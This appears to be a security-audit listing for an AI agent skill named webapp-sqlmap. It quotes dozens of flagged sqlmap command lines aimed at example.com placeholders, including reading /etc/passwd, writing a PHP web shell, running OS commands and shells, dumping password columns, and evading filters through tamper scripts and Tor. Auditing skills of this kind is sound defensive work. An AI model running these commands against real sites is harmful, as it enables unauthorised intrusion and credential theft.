webapp-sqlmap
Automates SQL injection detection and exploitation for web application security testing, ensuring vulnerabilities are identified and addressed.
Install this skill
Security score
The webapp-sqlmap skill was audited on Feb 28, 2026 and we found 73 security issues across 2 threat categories, including 1 high-severity. Review the findings below before installing.
Categories Tested
Security Issues
Access to /etc/passwd
| 194 | sqlmap -u "http://example.com/page?id=1" --file-read="/etc/passwd" |
Access to hidden dotfiles in home directory
| 270 | - **Logging**: All SQLMap activity is logged to ~/.sqlmap/output/ |
External URL reference
| 17 | - https://sqlmap.org/ |
External URL reference
| 18 | - https://owasp.org/www-community/attacks/SQL_Injection |
External URL reference
| 19 | - https://cwe.mitre.org/data/definitions/89.html |
External URL reference
| 36 | sqlmap -u "http://example.com/page?id=1" |
External URL reference
| 39 | sqlmap -u "http://example.com/login" --data="username=admin&password=test" |
External URL reference
| 45 | sqlmap -u "http://example.com/page?id=1" --dbs |
External URL reference
| 80 | sqlmap -u "http://example.com/product?id=1" |
External URL reference
| 83 | sqlmap -u "http://example.com/search?query=test&category=all&sort=name" |
External URL reference
| 86 | sqlmap -u "http://example.com/page?id=1&name=test" --level=5 --risk=3 |
External URL reference
| 92 | sqlmap -u "http://example.com/login" --data="user=admin&pass=test" |
External URL reference
| 98 | sqlmap -u "http://example.com/api" --data='{"user":"admin"}' --headers="Content-Type: application/json" |
External URL reference
| 104 | sqlmap -u "http://example.com/" --cookie="sessionid=abc123; role=user" |
External URL reference
| 107 | sqlmap -u "http://example.com/" --headers="X-Forwarded-For: 1.1.1.1\nUser-Agent: Test" |
External URL reference
| 110 | sqlmap -u "http://example.com/" --cookie="sessionid=abc123*; role=user" |
External URL reference
| 119 | sqlmap -u "http://example.com/page?id=1" |
External URL reference
| 122 | sqlmap -u "http://example.com/page?id=1" --level=5 --risk=3 |
External URL reference
| 125 | sqlmap -u "http://example.com/page?id=1" --technique=BEUSTQ |
External URL reference
| 128 | sqlmap -u "http://example.com/page?id=1" --fingerprint |
External URL reference
| 131 | sqlmap -u "http://example.com/page?id=1" --dbms=mysql |
External URL reference
| 148 | sqlmap -u "http://example.com/page?id=1" --dbs |
External URL reference
| 151 | sqlmap -u "http://example.com/page?id=1" --current-db |
External URL reference
| 154 | sqlmap -u "http://example.com/page?id=1" -D database_name --tables |
External URL reference
| 157 | sqlmap -u "http://example.com/page?id=1" -D database_name -T users --columns |
External URL reference
| 160 | sqlmap -u "http://example.com/page?id=1" --users |
External URL reference
| 163 | sqlmap -u "http://example.com/page?id=1" --privileges |
External URL reference
| 172 | sqlmap -u "http://example.com/page?id=1" -D database_name -T users --dump |
External URL reference
| 175 | sqlmap -u "http://example.com/page?id=1" -D database_name -T users -C username,password --dump |
External URL reference
| 178 | sqlmap -u "http://example.com/page?id=1" --dump-all |
External URL reference
| 181 | sqlmap -u "http://example.com/page?id=1" --dump-all --exclude-sysdbs |
External URL reference
| 184 | sqlmap -u "http://example.com/page?id=1" -D database_name --search -C password |
External URL reference
| 194 | sqlmap -u "http://example.com/page?id=1" --file-read="/etc/passwd" |
External URL reference
| 197 | sqlmap -u "http://example.com/page?id=1" --file-write="shell.php" --file-dest="/var/www/html/shell.php" |
External URL reference
| 203 | sqlmap -u "http://example.com/page?id=1" --os-cmd="whoami" |
External URL reference
| 206 | sqlmap -u "http://example.com/page?id=1" --os-shell |
External URL reference
| 209 | sqlmap -u "http://example.com/page?id=1" --sql-shell |
External URL reference
| 215 | sqlmap -u "http://example.com/login" --data="user=admin&pass=test" --auth-type=Basic |
External URL reference
| 218 | sqlmap -u "http://example.com/page?id=1" --auth-cred="admin:password" |
External URL reference
| 227 | sqlmap -u "http://example.com/page?id=1" --tamper=space2comment |
External URL reference
| 230 | sqlmap -u "http://example.com/page?id=1" --tamper=space2comment,between |
External URL reference
| 233 | sqlmap -u "http://example.com/page?id=1" --random-agent |
External URL reference
| 236 | sqlmap -u "http://example.com/page?id=1" --user-agent="Mozilla/5.0..." |
External URL reference
| 239 | sqlmap -u "http://example.com/page?id=1" --delay=2 |
External URL reference
| 242 | sqlmap -u "http://example.com/page?id=1" --proxy="http://127.0.0.1:8080" |
External URL reference
| 245 | sqlmap -u "http://example.com/page?id=1" --tor --check-tor |
External URL reference
| 298 | sqlmap -u "http://example.com/page?id=1" --batch |
External URL reference
| 301 | sqlmap -u "http://example.com/page?id=1" --dbs --batch |
External URL reference
| 304 | sqlmap -u "http://example.com/page?id=1" --current-user --current-db --is-dba --batch |
External URL reference
| 311 | sqlmap -u "http://example.com/login" \ |
External URL reference
| 318 | sqlmap -u "http://example.com/login" \ |
External URL reference
| 328 | sqlmap -u "http://api.example.com/user/1" \ |
External URL reference
| 334 | sqlmap -u "http://api.example.com/search" \ |
External URL reference
| 344 | sqlmap -u "http://example.com/page?id=1" \ |
External URL reference
| 368 | sqlmap -u "http://example.com/page?id=1" --proxy="http://127.0.0.1:8080" |
External URL reference
| 375 | sqlmap -u "http://example.com/page?id=1" -s output.sqlite |
External URL reference
| 378 | sqlmap -u "http://example.com/page?id=1" --resume |
External URL reference
| 381 | sqlmap -u "http://example.com/page?id=1" --output-dir="/path/to/results" |
External URL reference
| 384 | sqlmap -u "http://example.com/page?id=1" -v 3 |
External URL reference
| 387 | sqlmap -u "http://example.com/page?id=1" -t traffic.log |
External URL reference
| 397 | sqlmap -u "http://example.com/page?id=1" --string="Welcome" --not-string="Error" |
External URL reference
| 400 | sqlmap -u "http://example.com/page?id=1" --technique=U |
External URL reference
| 403 | sqlmap -u "http://example.com/page?id=1" --sql-query="SELECT version()" |
External URL reference
| 411 | sqlmap -u "http://example.com/page?id=1" --tamper=space2comment,between --random-agent |
External URL reference
| 414 | sqlmap -u "http://example.com/page?id=1" --delay=3 --randomize |
External URL reference
| 417 | sqlmap -u "http://example.com/page?id=1" --method=PUT |
External URL reference
| 425 | sqlmap -u "http://example.com/page?id=1" --threads=5 |
External URL reference
| 428 | sqlmap -u "http://example.com/page?id=1" --level=1 --risk=1 |
External URL reference
| 431 | sqlmap -u "http://example.com/page?id=1&name=test" -p id |
External URL reference
| 460 | - [SQLMap Official Documentation](https://sqlmap.org/) |
External URL reference
| 461 | - [OWASP SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection) |
External URL reference
| 462 | - [CWE-89: SQL Injection](https://cwe.mitre.org/data/definitions/89.html) |
External URL reference
| 464 | - [PTES: Vulnerability Analysis](http://www.pentest-standard.org/index.php/Vulnerability_Analysis) |